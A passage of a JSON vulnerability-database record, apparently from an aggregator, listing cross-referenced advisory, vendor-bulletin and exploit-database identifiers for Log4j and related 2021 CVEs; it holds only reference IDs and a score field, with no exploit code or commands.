"THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1", "USN-5203-1", "USN-5222-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-44832", "UB:CVE-2021-45046", "UB:CVE-2021-45105"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348", "VERACODE:33382", "VERACODE:33476"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-21-1541", "ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37781", "1337DAY-ID-37889"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:94B715279ABA113C427A5E987C080DA7", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS2-2021-1730", "ALAS2-2021-1731"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:83F1ABD4-4E2B-4E5A-BFE5-81C4FB7A474A", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "broadcom", "idList": ["BSA-2021-1658"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0476", "CPAI-2021-0548", "CPAI-2021-0936", "CPAI-2021-0955"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:D7188D434879621A3A83E708590EAE42"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE", "DEBIAN:DSA-5024-1:FE296"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046", "DEBIANCVE:CVE-2021-45105"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243", "EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34162192"]}, {"type": "fedora", "idList": ["FEDORA:59AA230A7074", "FEDORA:7DC2630AEB07", "FEDORA:E468830AF07B"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-7RJR-3Q55-VV33", "GHSA-8489-44MV-GGJ8", "GHSA-JFH8-C2JP-5V3Q", "GHSA-P6XC-XR62-6R2G", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "14482532-2406-58DF-89FF-30B085015257", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26905C55-5DC7-5275-A0AF-FAF06685612E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "59A6FBED-4F3E-5B1E-87FF-E637492A268A", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "604B2FE5-9DF8-5C70-878D-2CCFAA39A6C1", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "70582B5B-E1E6-5767-94A6-39740A96A052", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7C8BD924-02A0-5873-B8AF-445DE0103959", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "938D4200-A40C-5294-A146-4DF378B29573", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", 